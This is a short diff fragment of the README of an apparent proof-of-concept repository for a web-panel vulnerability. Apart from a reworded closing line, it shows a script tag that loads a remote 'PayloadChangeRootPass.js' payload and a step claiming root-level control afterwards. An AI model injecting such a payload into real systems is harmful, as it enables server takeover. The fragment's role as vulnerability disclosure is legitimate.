TnExperts/cwppoc/README.md

 <script type="text/javascript" src="https://raw.githubusercontent.com/TnExperts/cwppoc/main/PayloadChangeRootPass.js"></script>
 ```

 3. You can perform any action you want as the root user.
-Your imagination is the limit....
+The only limit is your imagination....

 #  Timeline